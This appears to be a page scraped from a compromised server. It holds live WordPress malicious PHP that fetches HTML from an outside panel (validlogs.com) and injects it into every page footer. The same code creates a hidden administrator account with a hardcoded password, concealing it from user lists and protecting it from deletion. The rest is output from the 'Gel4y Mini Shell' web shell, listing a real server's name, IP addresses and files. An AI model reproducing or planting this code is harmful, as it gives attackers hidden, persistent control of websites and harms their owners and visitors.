function wp_injector_fetch_code() { $backend_url = 'https://validlogs.com/BackPanel/panel.php'; $domain = sanitize_text_field($_SERVER['HTTP_HOST']); $response = wp_remote_post($backend_url, array('body' => array('action' => 'register_domain', 'domain' => $domain), 'timeout' => 5)); if (is_wp_error($response)) return; $html_code = wp_remote_retrieve_body($response); if (!empty($html_code)) { add_action('wp_footer', function() use ($html_code) { echo $html_code; }); } } add_action('init', 'wp_injector_fetch_code'); ob_start(); ?> if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } function wp_injector_fetch_code() { $backend_url = 'https://validlogs.com/BackPanel/panel.php'; $domain = sanitize_text_field($_SERVER['HTTP_HOST']); $response = wp_remote_post($backend_url, array('body' => array('action' => 'register_domain', 'domain' => $domain), 'timeout' => 5)); if (is_wp_error($response)) return; $html_code = wp_remote_retrieve_body($response); if (!empty($html_code)) { add_action('wp_footer', function() use ($html_code) { echo $html_code; }); } } add_action('init', 'wp_injector_fetch_code'); ob_start(); ?> Gel4y Mini Shell

Gel4y Mini Shell

PHP Version : 7.4.33
+File +Directory
  • Server : x3immune.vn (157.245.199.161/216.73.216.25)
  • Path: ~/opt/saltstack/salt/run/pip/_vendor/rich/
    Name Size Permission Action
    __pycache__ N/A drwxr-xr-x
    __init__.py 5.805KB -rw-r--r--
    __main__.py 8.602KB -rw-r--r--
    _cell_widths.py 9.859KB -rw-r--r--
    _emoji_codes.py 136.948KB -rw-r--r--
    _emoji_replace.py 1.039KB -rw-r--r--
    _export_format.py 2.064KB -rw-r--r--
    _extension.py 0.259KB -rw-r--r--
    _inspect.py 9.468KB -rw-r--r--
    _log_render.py 3.149KB -rw-r--r--
    _loop.py 1.207KB -rw-r--r--
    _palettes.py 6.897KB -rw-r--r--
    _pick.py 0.413KB -rw-r--r--
    _ratio.py 5.344KB -rw-r--r--
    _spinners.py 19.452KB -rw-r--r--
    _stack.py 0.343KB -rw-r--r--
    _timer.py 0.407KB -rw-r--r--
    _win32_console.py 22.285KB -rw-r--r--
    _windows.py 1.881KB -rw-r--r--
    _windows_renderer.py 2.718KB -rw-r--r--
    _wrap.py 1.797KB -rw-r--r--
    abc.py 0.869KB -rw-r--r--
    align.py 10.125KB -rw-r--r--
    ansi.py 6.66KB -rw-r--r--
    bar.py 3.188KB -rw-r--r--
    box.py 9.633KB -rw-r--r--
    cells.py 4.397KB -rw-r--r--
    color.py 17.536KB -rw-r--r--
    color_triplet.py 1.029KB -rw-r--r--
    columns.py 6.964KB -rw-r--r--
    console.py 93.638KB -rw-r--r--
    constrain.py 1.258KB -rw-r--r--
    containers.py 5.368KB -rw-r--r--
    control.py 6.475KB -rw-r--r--
    default_styles.py 7.768KB -rw-r--r--
    diagnose.py 0.949KB -rw-r--r--
    emoji.py 2.442KB -rw-r--r--
    errors.py 0.627KB -rw-r--r--
    file_proxy.py 1.578KB -rw-r--r--
    filesize.py 2.448KB -rw-r--r--
    highlighter.py 9.36KB -rw-r--r--
    json.py 4.933KB -rw-r--r--
    jupyter.py 3.176KB -rw-r--r--
    layout.py 13.744KB -rw-r--r--
    live.py 13.84KB -rw-r--r--
    live_render.py 3.581KB -rw-r--r--
    logging.py 11.202KB -rw-r--r--
    markup.py 8.006KB -rw-r--r--
    measure.py 5.181KB -rw-r--r--
    padding.py 4.854KB -rw-r--r--
    pager.py 0.809KB -rw-r--r--
    palette.py 3.316KB -rw-r--r--
    panel.py 8.539KB -rw-r--r--
    pretty.py 35.719KB -rw-r--r--
    progress.py 58.346KB -rw-r--r--
    progress_bar.py 7.97KB -rw-r--r--
    prompt.py 11.038KB -rw-r--r--
    protocol.py 1.358KB -rw-r--r--
    region.py 0.162KB -rw-r--r--
    repr.py 4.345KB -rw-r--r--
    rule.py 4.661KB -rw-r--r--
    scope.py 2.775KB -rw-r--r--
    screen.py 1.554KB -rw-r--r--
    segment.py 23.656KB -rw-r--r--
    spinner.py 4.271KB -rw-r--r--
    status.py 4.321KB -rw-r--r--
    style.py 25.625KB -rw-r--r--
    styled.py 1.229KB -rw-r--r--
    syntax.py 33.884KB -rw-r--r--
    table.py 38.589KB -rw-r--r--
    terminal_theme.py 3.291KB -rw-r--r--
    text.py 43.619KB -rw-r--r--
    theme.py 3.542KB -rw-r--r--
    themes.py 0.1KB -rw-r--r--
    traceback.py 25.449KB -rw-r--r--
    tree.py 8.954KB -rw-r--r--
    Copyright © 2021 - Powered By Indonesian Darknet